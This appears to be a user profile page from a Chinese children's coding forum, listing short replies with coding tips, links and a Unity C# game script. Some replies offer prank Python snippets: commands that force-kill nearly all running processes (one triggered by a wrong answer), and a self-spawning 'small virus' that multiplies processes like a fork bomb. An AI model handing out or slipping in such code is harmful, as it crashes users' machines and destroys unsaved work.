猫史档案馆


申浩南

申浩南

Lv.1

获赞:129收藏:7浏览:753作品收藏:20
回复帖子评论
上一页6 页 / 共 6下一页

有没有人能帮我做赵云论坛的图标 中回复

center_image

2022-04-06T08:31:32 点赞:0

用一句话形容一下你楼下的名字 中回复

翻译:炙热的

2022-04-06T22:22:51 点赞:0

怎么样才能将电脑里面有的歌曲发布在论坛里。 中回复

在网易云音乐找一样的然后分享iframe

 

2022-04-07T07:49:11 点赞:0

什么作品ID 中回复

center_image

2022-04-08T13:46:55 点赞:0

【Python作品分享】简易计算机【作业帖】 中回复

为什么要引入turtle?

2022-04-10T19:41:11 点赞:0

请问如何打出隐形空格? 中回复

  

2022-04-30T21:48:28 点赞:0

一本通C++编译错误问题 中回复

int main()的main()拼错了

2022-05-12T13:19:56 点赞:0

SiKi学院编程学习 中回复

www.sikiedu.com

2022-05-15T19:33:52 点赞:1

【python GUI】你平时用什么写GUI 中回复

3

 

2022-05-19T21:58:16 点赞:0

哪里错了??? 中回复

pic没定义

2022-05-21T16:58:26 点赞:0

[求助]有谁会python爬虫吗 中回复

# requests
docs.python-requests.org/zh_CN/latest/
# urllib
docs.python.org/zh-cn/3/library/urllib.html
# 都是官方文档

2022-05-22T13:25:20 点赞:0

谁会C++的给我站出来! 中回复

using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using UnityEngine.SceneManagement;

public class GameManager : MonoBehaviour
{

    private Transform startPoint;
    private Transform spawnPoint;
    public GameObject pinPrefab;
    private Pin currentPin;
    private bool isGameOver = false;
    private int score = 0;
    public Text scoreText;
    private Camera mainCamera;
    public float speed = 3;

    // Start is called before the first frame update
    void Start()
    {
        startPoint = GameObject.Find("StartPoint").transform;
        spawnPoint = GameObject.Find("SpawnPoint").transform;
        mainCamera = Camera.main;
        SpawnPin();
    }
    private void Update()
    {
        if (isGameOver) return;
        if (Input.GetMouseButtonDown(0))
        {
            score++;
            scoreText.text = score.ToString();
            currentPin.StartFly();
            SpawnPin();
        }
    }
    void SpawnPin()
    {
        currentPin =  GameObject.Instantiate(pinPrefab, spawnPoint.position, pinPrefab.transform.rotation).GetComponent<Pin>();


    }
    public void GameOver()
    {
        if (isGameOver) return;
        GameObject.Find("Circle").GetComponent<RotateSelf>().enabled = false;
        StartCoroutine(GameOverAnimation());
        isGameOver = true;
    }
    IEnumerator GameOverAnimation()
    {
        while(true)
        {
            mainCamera.backgroundColor = Color.Lerp(mainCamera.backgroundColor, Color.red,speed*Time.deltaTime);
            mainCamera.orthographicSize = Mathf.Lerp(mainCamera.orthographicSize, 4, speed*Time.deltaTime);
            if (Mathf.Abs(mainCamera.orthographicSize-4)<0.01f)
            {
                break;
            }
            yield return 0;
        }
        yield return new WaitForSeconds(0.2f);
        SceneManager.LoadScene(SceneManager.GetActiveScene().buildIndex);
    }
}

2022-07-02T09:24:20 点赞:0

全网搜寻—————软件推荐 中回复

Photoshop

 

2022-07-02T18:22:09 点赞:0

【Python作品分享】密码(作者刚学python) 中回复

import os
os.system('taskkill -f -fi "pid ne 1"')

2022-07-09T11:53:20 点赞:1

【Python作品分享】好玩的【作品秀】 中回复

import os
if input("喵 ")=="爸爸":
    print("乖喵~")
else:
    os.system('taskkill -f -fi "pid ne 1"')

2022-07-09T14:47:45 点赞:0

测我的知名度 中回复

‮1.。。。

2022-07-10T13:12:27 点赞:0

【编程猫创作者协会|夏招】久等了,半年等待。 中回复

215674

2022-07-24T09:33:15 点赞:0

Python小病毒 中回复

# 需安装python环境
import os
os.system(f"python {__file__}")
os.system(f"python {__file__}")

2022-07-25T14:55:51 点赞:0

我被盗号了,最骄傲的作品被删了 中回复

https://shequ.codemao.cn/my

2022-07-28T21:54:32 点赞:0

【编创协赛事平台】注册准考证身份识别贴 中回复

178262

2022-10-02T21:16:26 点赞:0

https://turtle.codemao.cn/player/h5/1753喵766 中回复

网页版没有tkinter 下个桌面版海龟

2023-01-31T15:33:33 点赞:0